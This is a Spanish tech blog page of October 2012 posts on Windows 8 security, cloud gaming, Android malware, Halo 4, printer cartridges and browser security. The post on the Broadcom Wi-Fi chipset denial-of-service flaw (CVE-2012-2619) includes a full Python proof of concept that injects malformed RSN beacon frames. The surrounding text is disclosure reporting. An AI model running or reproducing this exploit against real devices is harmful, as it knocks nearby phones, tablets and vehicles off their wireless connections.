miércoles, 31 de octubre de 2012

Las mejoras en seguridad que ofrece Windows 8.


Las mejoras en seguridad que ofrece Windows 8.

 
Windows-8-Logo
 

Llevo ya algún tiempo usando Windows 8 y hasta ahora, no tengo cosa mala que decir, hasta lo instale en la PC de mi hijo de 5 años y lo usa si problemas pese a que no tiene el menú de inicio clásico que tantos usuarios ven como un inconveniente  Los principales aspectos, novedades e innovaciones del nuevo sistema operativo de Microsoft, Windows 8, se van desgranando poco a poco. 

Lo último que destacan los expertos en el software son los aspectos relativos a la protección anti-malware. En concreto, el concepto de seguridad temprana que comprende el primer driver de software que se descargará en Windows 8 como programa anti-malware de usuario, frente a lo que los especialistas llaman “tierra de nadie de anteriores versiones”, ya que la descarga de este software de usuario era aleatorio y cualquier virus podía llegar primero al sistema y burlar sus defensas.

Microsoft sigue impulsando que los programas antivirus de terceros superen un  proceso de revisión de firma digital que permitirá que se cargue antes de arrancar el sistema y comprobar que está limpio antes de continuar con el proceso de arranque, asegura Aryeh Goretsky, investigador del la firma de software antivirus ESET.

Pero hay un problema en todo esto, y es que Microsoft está facturando su propio software anti-malware con Windows 8, el denominado Windows Defender. Y, a menos que el usuario lo tenga desinstalado, esta función será la primera que se descargue. Como algunos fabricantes de ordenadores hacen dinero con grandes proveedores de seguridad, como Symantec o McAfee, pueden desinstalar esta función antes de que los equipos lleguen al cliente, explica Goretsky.

Ello es posible porque, por primera vez, Microsoft permite borrar directamente los  paquetes de seguridad a petición del usuario. Uno de los sucios secretos de la industria ha sido que los programas anti-malware han sido conocidos desde hace tiempo por hacer cambios de registro y otras modificaciones en el sistema operativo que básicamente dificultaba el retorno al estado anterior, asegura el experto que subraya otros aspectos de seguridad positivos en Windows 8, como el interfaz de firma extensible unificado que pide firmas digitales para ser utilizadas en el arranque y prevenir que se introduzca un kit de raíz en el mismo. Este 
proceso de arranque seguro se apoya en el estándar UEFI de la industria.
 
 
Más información:
 

¿Como será el futuro de los video juegos?.


¿Como será el futuro de los video juegos?.
 
Ya bastante que he tocado el tema de los video juegos y para el que me conozca, no es un secreto que soy un gamer y prefiero claramente un buen PC de gama alta a cualquier consola de juego, pero el mundo de los video juegos no solo soy yo, las tendencias son a optimizar los video juegos para que corran bien en las consolas y de un tiempo acá, se vislumbra la nube como escenario de juegos por lo que la pregunta es, ¿como será el futuro de los video juegos?.
Para cada participante en esta masiva industria del pixel, el futuro pinta muy diferente; todos tienen una opinión que consideran la correcta sin lugar a dudas. Microsoft y Apple contemplan que el horizonte se debe delinear con tiendas de aplicaciones, mientras que Gabe Newell y su gente de Valve piensan que sólo la libertad creativa garantiza un porvenir estable; entretanto, Electronic Arts, Ubisoft, Epic y Crytek, entre muchos otros, auguran muy diversos resultados para los años próximos. Según NVIDIA, “no es muy difícil predecir lo que nos depara el mañana”, y es que su liderazgo –junto con AMD– en el desarrollo de tecnologías gráficas le permite tener un panorama diferente al resto de las compañías que coexisten en el mundo de los videojuegos. Es así que en una muy amena plática, el fabricante de GPU nos compartió su visión del futuro, abordando las promesas del juego en Nube y lo que nos espera con los procesadores de alto rendimiento.
Un pedazo de nube para todos
En nuestra ajetreada vida diaria, rara vez volteamos al cielo para mirar las nubes, ese acolchonado tapiz que puede tomar cualquier forma, sean naves alienígenas a monarcas felinos y sólo hasta que se avecina la tormenta, nos obligan a reconocer su presencia. Lo mismo ha sucedido con el cloud gaming, que en principio fue despreciado por su inestabilidad y por ser incapaz de ofrecer una experiencia de calidad –en especial si lo comparamos con el elevado nivel visual de la PC–, para convertirse en una tendencia que promete cambios importantes en los videojuegos, tal vez sin romper esquemas, pero según Nvidia, hará tambalearse el reinado de las consolas, ya de por sí tocado por los móviles y la PC.
Nvidia asegura que al usar GPU GeForce GRID en sus servidores, servicios como Gaikai y OnLive han aumentado considerablemente su tiempo de respuesta, garantizando una experiencia fluida
 
NVIDIA asegura que al usar GPU GeForce GRID en sus servidores, servicios como Gaikai y OnLive han aumentado considerablemente su tiempo de respuesta, garantizando una experiencia fluida
Es un hecho que a pesar del acelerado incremento de la tecnología y su consecuente abaratamiento, no todos poseen un equipo tan avanzado como para hacer lo que deseen, y a decir verdad, el número de personas privilegiadas con tal computadora, es limitado. Cuando se trata de videojuegos el número es aún más bajo, pues tener una máquina exótica sobrepasa, por mucho, el presupuesto de un jugador promedio. La Nube, en palabras del gerente de marca Alejando Torres, permitirá disfrutar las experiencias más avanzadas en toda clase de dispositivo, evitando la limitante de que para jugar lo nuevo, tienes que utilizar la consola más novedosa, la mejor computadora o la tablet –y smartphone– de moda.
En otras palabras, no importa el tipo de aparato que tengas en tu poder, si es compatible, podrá recibir una transmisión vía Internet de cualquier título, sea tan básico como Cut the Rope o tan exótico en gráficas comoCrysis 3 con todo y visualización sobre DirectX 11. El vehículo para lograrlo llegará con servicios como Gaikai y OnLive, a los que ya dedicamos su espacio, pero el motor de la iniciativa será GeForce GRID, tecnología que dará poder a los servidores remotos en los cuales estén alojados los juegos.
Pero primero...
Antes de considerar el futuro, los representantes de Nvidia están conscientes del presente: aún hay serios problemas que resolver. El principal, la velocidad de respuesta entre experiencias, pues no es lo mismo la inmediatez de un aparato que tienes enfrente, a una señal que debe recorrer largas distancias para ser procesada, y después regresar. No obstante, superar lo que hace una consola es tarea más sencilla, “dado que la actual generación se ha vuelto obsoleta, y durante 7 años se ha quedado estática”. Lo mismo sucederá, de acuerdo con Nvidia, cuando lleguen las próximas plataformas de los 3 máximos fabricantes, ofrecerán un ecosistema estable, aunque sea estático.
La Nube en cambio, dicen, evolucionará a paso sostenido, siempre actualizando su presentación, trayéndonos la mejor calidad gráfica, si las conexiones de Internet crecen y se abaratan. La promesa es que, si bien el cloud gaming no superará las virtudes de una PC, que por cierto también puede actualizarse de forma constante –pagando a veces un elevado precio–, dará beneficios interesantes para quien gusta jugar en su televisor.
Es incierto qué traerán las consolas de nueva generación, pero según Nvidia, la capacidad gráfica podría ser opacada por las constantes mejoras de la Nube
 
Es incierto qué traerán las consolas de nueva generación, pero según NVIDIA, la capacidad gráfica podría ser opacada por las constantes mejoras de la Nube
“Quien juega en PC siempre va a preferir el poder y la respuesta de su equipo, al que le invirtió una gran cantidad de dinero. La Nube no va a reemplazar esa experiencia, simplemente la va a extender, supliendo la exigencia por las mejores gráficas en otras plataformas; el usuario tendrá algunos problemas de respuesta, pero agradecerá la conveniencia de jugar en múltiples aparatos”, comenta Torres, sugiriendo que la única forma de alcanzar el verdadero interplataforma o trasladar nuestro juego de un aparato a otro, llegará con la Nube.
Otra complicación se da ante la calidad del servicio en todos sus componentes. “La calidad es el aspecto fundamental de la Nube, sin ella, la gente no se sentirá atraída”, afirma nuestro interlocutor. El comentario nos hace considerar lo que sucedió con Diablo III hace algunos meses, justo en la importante etapa de lanzamiento. Tal vez la expectativa influyó mucho, pero los primeros días tras la salida del juego fueron tan accidentados que mucha gente resultó decepcionada, aún si haber probado el contenido. Netflix padeció una suerte similar, de inicio mucha gente no tenía muy buena opinión, debido a que la transferencia de datos no era óptima, y ahora, con el aumento de poder en la banda ancha, es el servicio de televisión a la carta más popular en todo el mundo.
Requerimientos obligados
Lo mismo podría pasar con la Nube, por ello requiere un delicado equilibrio entre el prestador del servicio, los intermediarios (como un proveedor de televisión por cable o el fabricante de la consola) y los encargados de la tecnología base. “NVIDIA toma parte de esa posición clave, construyendo la tecnología necesaria para que el tiempo de respuesta sea mínimo. Ahí es donde GRID toma importancia, pues la arquitectura de los procesadores está diseñada para establecer el menor tiempo de respuesta.” De acuerdo con pruebas presentadas en el sitio de la compañía, con una conexión de Internet no tan veloz se puede obtener un tiempo de respuesta menor que el de consola a televisor. Por supuesto, parece no superar la velocidad de una PC, y tal vez nunca lo consiga, pero la meta, en palabras de los voceros de NVIDIA, es acercarse lo más posible.
Cabe mencionar que la seguridad es otra preocupación frecuente cuando se piensa en las posibilidades de la Nube. Parte de la perfecta coordinación entre todos los involucrados será establecer un sistema libre de vulnerabilidades o tanto como sea posible. La regla dicta que a mayor número de participantes, mayor es el riesgo de que se presenten errores. Por su parte, NVIDIA dice comprometerse a supervisar los esfuerzos de sus colegas, aunque reconoce no tener autoridad para obligarlos a seguir lineamientos, y admite que el esfuerzo debe ser conjunto y equitativo para que funcione. Los voceros del fabricante tecnológico dicen que son problemas de fácil solución, además, han aprendido cuáles son los puntos más vulnerables de un servicio en línea. La nota final en lo que va de seguridad es que ningún sistema es infalible, “y ante eso lo más importante es reconocerlo con humildad, ante el riesgo de tropezar por exceso de confianza”.
El abaratamiento de procesadores gráficos para móvil permitirá que en un futuro cercano cualquier dispositivo tenga compatibilidad para ejecutar juegos en la Nube
 
El abaratamiento de procesadores gráficos para móvil permitirá que en un futuro cercano cualquier dispositivo tenga compatibilidad para ejecutar juegos en la Nube
El compromiso con el futuro
Para el gerente técnico Antonio Reyes, lo más emocionante es que la reacción de los desarrolladores ha sido muy positiva, un gran número se interesó cuando el nombre de NVIDIA se puso sobre la mesa del juego en Nube. Así las cosas, hay reportes de que Crytek y Epic están reescribiendo sus motores gráficos para ajustarse a la Nube, y hacer de esta nueva tendencia una experiencia más dinámica que el juego local. En nuestra opinión, el favor de las casas productoras hacia el cloud gaming no provocará la desaparición de las consolas, y dicho sea de paso, NVIDIA también lo piensa –dicen que las plataformas convencionales no se extinguirán en al menos 5 años–, pero si se le sigue dando promoción, la Nube podría postularse como una fuerza igual de importante que la de las consolas.
La industria está cambiando, siempre lo hará, hay tendencias que permanecen y otras que quedan en el olvido, pero la red mundial alteró la forma en que jugamos y del mismo modo que se condenaba al componente en línea como una moda pasajera, la Nube tiene el potencial para convertirse en un fenómeno a muy largo plazo, no sólo en los videojuegos sino en lo que refiere a todas las actividades en Internet. La Nube no reemplazará las formas tradicionales de juego, tanto como Netflix no nos ha sacado de las salas de cine; es una alternativa cómoda, tal vez más conveniente para ciertos estilos de vida, pero un formato no es mejor que otro, sólo es diferente.
Así, la perspectiva de Alejandro Torres apunta a una expansión desmesurada de la audiencia, ya que mientras en la actualidad los videojuegos de gran producción están limitados a una consola que cuesta más de $200 dólares, o a un equipo computacional que por lo menos requiere invertir $1,000 USD, si usamos la Nube, simplemente habría que pagar una suscripción, y si los proveedores de televisión por cable se suman a la iniciativa, en unos meses la industria del videojuego ganaría miles de millones de adeptos, todos felices de no tener que gastar tanto en consolas, ni en el costo total de los juegos. Una vez más, no abandonaríamos el formato físico de manera contundente, después de todo muchos tenemos ese sentido de pertenencia que nos obliga a comprar el juego con su caja, pero del mismo modo hay otro tanto que prefiere no tener el objeto material y sólo quiere vivir la experiencia… nada más.
La trayectoria de la Nube es similar a la evolución de la telefonía celular, en inicio apenas se usaban para voz y su función progresó hasta ofrecer toda clase de aplicaciones
 
La trayectoria de la Nube es similar a la evolución de la telefonía celular, en inicio apenas se usaban para voz y su función progresó hasta ofrecer toda clase de aplicaciones
“Cuando le facilitas tanto las cosas a la gente creas un gran potencial de alcance. Servicios como Spotify y Pandora hacen de la música algo más accesible. Simplemente piensas en un grupo y lo obtienes, adiós a la necesidad de salir a comprar un disco, o peor aún, sufrir el hecho de que no lo tengan. Lo mismo sucederá con los videojuegos, ya no tendrás que ir a un establecimiento, gastar $60 dólares, instalar el juego, actualizar el sistema y poner parches. En lugar de eso será tan sencillo como prender el dispositivo, y jugar instantáneamente, probablemente hasta sin pagar con una tarjeta de crédito”, comentan con entusiasmo los representantes de NVIDIA.
Al margen de quien lo diga, suena sumamente atractivo, no obstante quedan muchos cabos sueltos que antes tendrían que amarrarse para que la experiencia que ofrece la Nube tenga el mismo atractivo que jugar en línea con una consola. De principio, sería necesario establecer achievements, trofeos o cualquier sistema de reconocimientos que sin duda se han vuelto requisito para las comunidades digitales. Y junto a este, hay muchos otros aspectos que por ahora lucen demasiado nublados, pero si el cielo se despeja en esta vertiente del futuro, tal vez la Nube cumpla las promesas que tantos, incluido NVIDIA, nos están haciendo.

martes, 30 de octubre de 2012

El malware para Android crece un 483% en tres meses.


El malware para Android crece un 483% en tres meses.

 
¿Cuánto miedo deberían tener los usuarios de Android? A tenor de los últimos resultados de un estudio sobre seguridad de TrendMicro, quizás un poco. En los últimos tres meses, el malware para Android ha crecido un 483%. Las  30.000 aplicaciones maliciosas que la firma especialista en seguridad detectó el pasado mes de junio se han convertido en 175.000 a mes de septiembre.
La plataforma abierta de Android juega a los usuarios del sistema operativo una mala pasada en términos de seguridad, explican desde TrendMicro en un comunicado de prensa.“Esta explosión de malware en teléfonos móviles no nos pilla por sorpresa”, explica Raimund Genes, director de tecnologías de la información de Trend Micro. “Android es la plataforma más usual para smartphone, como lo indican los datos estadísticos y estudios de mercado, que además suelen consultar los cibercriminales”.
Las versiones falsas de las aplicaciones legítimas de Android son el tipo de malware más habitual entre las amenazas existentes para Android. Estas apps maliciosas quieren desviar datos o controlar el smartphone del usuario para así, por ejemplo, poder llamar a números de tarificación especial. “No olvidemos que así han encontrado nuevas fuentes de ingresos a través del malware en móviles”, añade Genes. “Y, al contrario de lo que sucede en los ordenadores, obtener datos de un teléfono móvil también proporciona la localización del usuario, las llamadas efectuadas y muchos más datos. Y toda esa información se puede vender”.
Y aunque las amenazas crecen, no lo hace la protección de terminales. Sólo el 20% de los usuarios de Android se han instalado una aplicación de seguridad aunque son varias las existentes en el mercado, algunas de ellas gratuitas.

Halo 4 es el juego más costoso en la historia de Microsoft.


Halo 4 es el juego más costoso en la historia de Microsoft.
 
Halo 4 está a algo más de 2 semanas de ser lanzado y seguro que todos aquellos con una Xbox 360 en casa se mueren por meterle mano. Sabemos que junto con el juego Microsoft se ha gastado una buena cantidad de dinero en promocionar el juego, junto con lo costoso que debe ser por sí mismo el desarrollo de un juego como la cuarta entrega numerada de la saga del Master Chief. ¿Pero sabemos cuanto se gastó Microsoft en mover toda esta parafernalia? Al parecer mucho.
Phil Spencer conversó con el medio Polygon y se refirió a Halo como “una franquicia de 3 millones de dólares. Es la más importante producción de entretenimiento en la compañía”
Cuando se le pregunta sobre si es la producción más cara, Spencer contesta: “Absolutamente. Nada se le acerca”
El ejecutivo no dio cifras pero para hacernos una vaga idea, Halo 3 costó 60 millones de dólares, incluyendo marketing. Dicho juego generó 300 millones de dólares en una semana. Halo 4 es más grande que eso.
¿Se convertirá Halo 4 en el juego más caro de la historia?
Sin cifras exactas es difícil de prever, aunque si tomamos en cuenta todo lo que rodea al juego, contamos con un tráiler dirigido por David Fincher, una miniserie, una enorme campaña publicitaria y por cierto, el desarrollo del juego. Parece bastante.
Otros juegos que han hecho historia con su presupuesto fueron, por ejemplo, Shenmue, que ostentó el título de “juego más caro de la historia” con un presupuesto de 70 millones de dólares. Más tarde sería superado por GTA IV con cerca de 100 millones de dólares de presupuesto.
 
Halo 4

Vulnerabilidad causa que multitud de Smartphones sufren problemas de conectividad vía WiFi.


Vulnerabilidad causa que multitud de Smartphones sufren problemas de conectividad vía WiFi.

Se ha publicado una vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo.

La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, del que hizo pública demostración durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional.

Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos, a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas.

El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2.

En coordinación con los investigadores y el US-CERT, Broadcom facilitó a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia, Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, por lo que se da como subsanada.

Los dispositivos afectados con el chipset BCM4325:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge

Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad

Y la prueba de concepto realizada por Matias Eissler:

- ------------------------- poc.py -------------------------
#!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096

# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'

sequence += 1
yield frame

if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)

iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()

generator = beaconFrameGenerator()

for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)

Más información:

VU#160027: Broadcom BCM4325 and BCM4329 wireless chipset denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/160027

Broadcom DoS on BCM4325 and BCM4329 deviceshttp://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM4329

One firmware to monitor 'em allhttp://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=One_firmware_to_monitor_em_all

¿Cartuchos originales vs genéricos?.


¿Cartuchos originales vs genéricos?.
 
recarga_premium_de_cartuchos_hp_lexmark_canon_olivetti_en_belgrano-4c18fdce44b468eca1094b1b4
Ya bastante que he tocado el tema, pero a raíz de un comentario que me hiciera una amigo, decidí aclarar un poco sobre el uso de sistemas continuos, cartuchos recargados o genéricos.  Antes que nada, debo decir que tengo una impresora HP de inyección de tinta y le instale yo mismo un sistema continuo de tinta el cual se ha traducido en un ahorro considerable de dinero ya que los consumibles HP son costosos.
Dicho lo anterior, debo aclarar también, que en ninguno de mis escrito he mencionado que los cartuchos recargados o los sistemas continuos de tinta ofrecen una calidad de impresión igual o mejor que la ofrecida por consumibles originales. Es descabellado pensar que si una empresa invierte miles de dólares en investigación para mejorar tanto sus tintas como sus cartuchos, una tinta genérica o un cartucho genérico, puedan lograr la misma calidad, en conclusión, cuando he mencionado los sistemas de tinta continuos o recarga de cartuchos, me refería al ahorro en dinero para el usuario domestico común ya que también explique que si eres un profesional y requieres de excelente acabado grafico, los consumibles originales son la respuesta sin ninguna duda.
HP invierte tiempo y dinero en mejorar sus sistemas de impresión
¿Quién no recuerda las antiguas y ruidosas impresoras que tardaban minutos en imprimir cada hoja? ¿O las defectuosas impresiones con la tinta corrida de hace ya más de 10 años? Las impresoras actuales imprimen con una calidad infinitamente mejor a estas primeras tecnologías gracias a las miles de horas de investigación de decenas de científicos. De hecho, en HP, antes de encontrar la fórmula adecuada de las tintas que utilizarán sus impresoras, realizan más de 1.000 prototipos para establecer el balance perfecto entre todos los componentes. Este trabajo se ha materializado en los últimos 20 años en más de 100 nuevas tintas... Te explicamos los secretos de estas innovaciones.
Si viéramos un cartucho de tinta mientras imprime a cámara lenta nos quedaríamos boquiabiertos. Sus 500 boquillas del tamaño de un tercio del grosor de un pelo humano disparan hasta 30 millones de pequeñas gotas de tinta por segundo, lo que requiere una exactitud milimétrica. El simple desajuste de alguno de estos minúsculos agujeros supondría una deficiencia en la impresión, tanto a nivel de color como a nivel de definición.
Es por ello que uno de los departamentos más importantes a nivel de innovación y desarrollo de las marcas de impresoras sea precisamente el de los cartuchos y tóners, donde la tinta es la punta de lanza del sistema. Para conseguir que ésta no obture las boquillas, el color sea más real, que aguante mejor posibles agresiones externas como el agua y llegue a durar hasta cuatro generaciones se invierten grandes cantidades de dinero y de tiempo. Como explican desde HP, "más de 100 químicos trabajan en el desarrollo de las fórmulas. Esta tarea puede llegar a necesitar entre 3 y 4 años de investigación".
Y es que, en palabras de esta misma marca, "el cartucho es el elemento más complejo y estudiado de una impresora ya que supone el 70 por ciento del sistema de la mecánica de la misma". Básicamente, utilizando un símil automovilístico que ejemplifique la importancia de los cartuchos de tinta, "cada vez que sustituyes un cartucho en la impresora, es como si cambiaras el motor de tu coche", explican.

¿Es importante utilizar recambios originales?

Un reciente estudio llevado a cabo por la consultora QualityLogic comparó los cartuchos originales HP frente a los compatibles. Según el informe, los cartuchos originales conseguían, de media, imprimir casi un 35 por ciento más de páginas que los que no eran originales de la marca. Pero las diferencias no solo son cuantitativas, según este análisis, sino que la calidad también se ve afectada. Como apunta el estudio, los consumibles que no eran originales presentaban un tasa de fallo del 15,7 por ciento, frente al menos del uno por ciento certificados en los accesorios originales de HP.
El informe realizado pone de manifiesto la importancia de la investigación en este sector informático donde anualmente se invierten millones de dólares para conseguir que las impresoras sean cada vez más fiables. De hecho, para mejorar un sistema de impresión se requieren más de 1.000 prototipos que certifiquen esta mejora.
Les invito a ver el siguiente video el cual es muestra de la diferencia entre consumibles genéricos y originales:http://www.youtube.com/watch?feature=player_embedded&v=giyQyd18_0s
 
Sin título
 

lunes, 29 de octubre de 2012

¿Cuándo abandonar el uso de un programa?.


¿Cuándo abandonar el uso de un programa?.
Vulnerabilidad-Internet

Ya ha bajado la marea con respecto a la noticia de la vulnerabilidad 0-day de Internet Explorer de la que ya había comentado hace días y que rápidamente Microsoft lanzó un parche para corregirla. Pues bien ahora con la cabeza más fría voy a analizar algunas cosas que pasaron durante esos días, ya que muchas voces de alarma aparecieron por Internet y entre ellas las del gobierno Alemán que recomendaba a sus ciudadanos no utilizar Internet Explorer y no es la primera vez que pasa.
 
Alemania lo ha vuelto a hacer: su gobierno desaconseja el uso de Internet Explorer después de descubrirse el grave fallo de seguridad que estaba siendo aprovechado por atacantes. No es la primera vez que lo hace y no siempre con este navegador. ¿Tiene fundamento su recomendación?

Un poco de historia 
A principios de septiembre de 2008 Google lanza su nuevo navegador Chrome. Una semana después, la red se inunda de comentarios sobre todos los aspectos de esta nueva aplicación y en particular sobre su seguridad. Muchos comentarios, exploits y aclaraciones después, el gobierno alemán desaconsejó explícitamente el uso de este navegador. Es cierto que comenzó con mal pie. La Oficina Federal para la Seguridad de la Información alemana desaconsejó abiertamente el uso del navegador Chrome en un importante informativo televisado. Tuvo mucho que ver su problema de privacidad.

A principios de 2010 es noticia en todos los medios que el gobierno alemán (ahora unido al francés) recomiendan no usar Internet Explorer como navegador, a raíz de los ataques perpetrados desde el gobierno Chino contra Google aprovechando una vulnerabilidad previamente desconocida del navegador de Microsoft.

En marzo de 2010, Mozilla publica oficialmente la versión 3.6.2 del navegador Firefox que soluciona (entre otros) un fallo de seguridad que estaba siendo aprovechado por atacantes desde hacía un mes. En esta ocasión el gobierno alemán recomendó no usar el navegador hasta que el
fallo fuese corregido.

Las noticias sobre Internet Explorer siempre tuvieron más cobertura en los medios, pero todos han sido "desaconsejados" por el gobierno alemán en algún momento.

¿Cuándo abandonar el uso de un programa? 
Es importante aclarar varios conceptos, para eliminar prejuicios e ir más allá de los titulares.

* 0-day no es cualquier vulnerabilidad recién encontrada, como se suele denominar. Un 0-day debe llamarse a la vulnerabilidad grave que se descubre cuando está siendo aprovechada por atacantes. Por tanto, alguien conoce no solo su existencia sino cómo aprovecharla y es más...
lo está haciendo no se sabe bien desde cuándo. Este es el peor escenario posible y bajo el que debemos barajar la posibilidad abandonar temporalmente el uso de un programa. Una vulnerabilidad recién descubierta publicada sin parche es eso: una vulnerabilidad sin parche que, probablemente en breve, será aprovechada por atacantes pero no se tiene constancia de que eso esté ocurriendo.

* El consejo es siempre temporal. Los programas evolucionan. Chrome empezó con mal pie en la seguridad y la privacidad para acabar siendo el navegador con más vulnerabilidades en número... pero el más seguro en conjunto. Internet Explorer camina hacia un navegador (por fin) en las antípodas de su eterna versión 6, y Opera está tardando en adoptar las mejores prácticas de seguridad, cuando históricamente siempre fue puntero. Los programas y las circunstancias cambian. Y lo inteligente es saber adaptarse.

Una vez contextualizado: ¿se debe abandonar el uso del programa o intentar mitigar su impacto? Pues depende de las necesidades y las circunstancias. Muchos portales internos o redes corporativas sólo funcionan con Internet Explorer, lo que puede impedir su abandono. En estos casos hay que luchar por mitigar el problema de seguridad con mayor ahínco hasta que exista parche. Bien deshabilitando (si es posible) una funcionalidad que lo provoque, bien tomando medidas más "agresivas" (meter en una sandbox de terceros al navegador durante un tiempo, si es que no se usa ya esa medida habitualmente). Los usuarios tienen diferentes necesidades, y no vale con abandonar como apestados a los que no pueden migrar. Es necesario proporcionarles información para que puedan decidir.

Si, por el contrario, se es libre para cambiar, se puede utilizar durante ese tiempo otro navegador. Sin embargo el problema se agrava con otro tipo de software, como Java por ejemplo. No existen demasiadas alternativas. Microsoft lanzó una máquina virtual Java propia que resultó un fiasco en seguridad, además de conseguir escaso éxito y grandes problemas con la justicia. La abandonó en 2003 (aunque le dio soporte hasta 2007). IBM tiene su propio JRE, pero no es tan popular. ¿Qué ocurre cuando aparece un 0-day como el de hace unas semanas en la máquina virtual Java de Oracle? No cabe más que el abandono temporal o limitar y vigilar extraordinariamente su uso asumiendo un riesgo adicional si no se tiene más remedio.

Ante problemas tan graves como están causando vulnerabilidades en Java, Flash o Adobe PDF Reader en los últimos años, quizás sería útil también un llamamiento público para vigilar su uso cuando se den las circunstancias de peligro descritas.

Conclusiones 
En general, al lanzar un mensaje de este tipo es necesario ser cuidadoso con el lenguaje. Por ejemplo, el gobierno recomendaba a los usuarios que buscasen una alternativa al navegador Internet Explorer de Microsoft, "para garantizar su seguridad". Esta afirmación es peligrosa, y puede llevar a equívocos. Evidentemente ningún navegador "garantiza la seguridad" sino que en lo posible y dada la situación (como siempre ocurre en seguridad) el uso de alternativas que no están siendo atacadas en estos momentos minimiza el riesgo. Pero también minimiza el riesgo (ahora y siempre) seguir usando cualquier navegador o programa si se aprovechan y se entienden a las medidas de seguridad que implementa o que se le pueden añadir.

En definitiva, no sabemos qué programa, ni de qué forma, puede estar siendo atacado en estos momentos. Recomendar el abandono de un navegador cuando aparezca un 0-day puede ser efectivo para alertar a los usuarios, pero es necesario hacerlo de forma completa y sistemática (no solo con los navegadores), cuidando al mensaje y siempre que exista un peligro real... en definitiva, un trabajo de alerta a tiempo completo.

De lo contrario, lo que se conseguirá con mensajes de este tipo descontextualizados es fomentar la eterna y absurda lucha de ideologías sobre el software, que con su ruido, no aporta demasiado en cuestión de seguridad.

La paradoja de la seguridad en los navegadores.


La paradoja de la seguridad en los navegadores.

Ya bastante que he tocado el tema de los navegadores, a cada rato me encuentro personas disertando sobre el tema, cual es mejor?, cual es más rápido?, cual es más seguro?. Hace poco hacia mención sobre el estudio que afirmaba que Internet Explorer es el navegador más seguro del mercado, pues bien, a diario vemos estudios contradictorios, encuestas contradictorias y pare de contar que hacen que uno dude sobre en verdad cual es el mejor a ciencia cierta, lo que si es cierto es que la seguridad en todos los navegadores es un tema algo polémico y paradójico.
 
Hoy nos encontramos ante lo que, a primera vista, se podría considerar una especie de paradoja en la aproximación a la seguridad en navegadores: el navegador con más fallos de seguridad y el más popular, es el más seguro. Sin embargo, se trata en realidad de una evolución natural que demuestra que lo importante es la protección, y no tanto las vulnerabilidades.

Existe una creencia popular: El navegador más popular es el más atacado. Si además es el que mayor número de fallos de seguridad contiene, el círculo se cierra. ¿Quién usaría algo así? Hasta ahora, Internet Explorer honraba esta máxima... pero Chrome la ha desmentido. Desde mediados de año es el más usado y siempre ha sido el que más fallos contabiliza... pero es el más seguro en el mundo real (es un hecho que confirma cualquier creador de exploits).

En los 90 
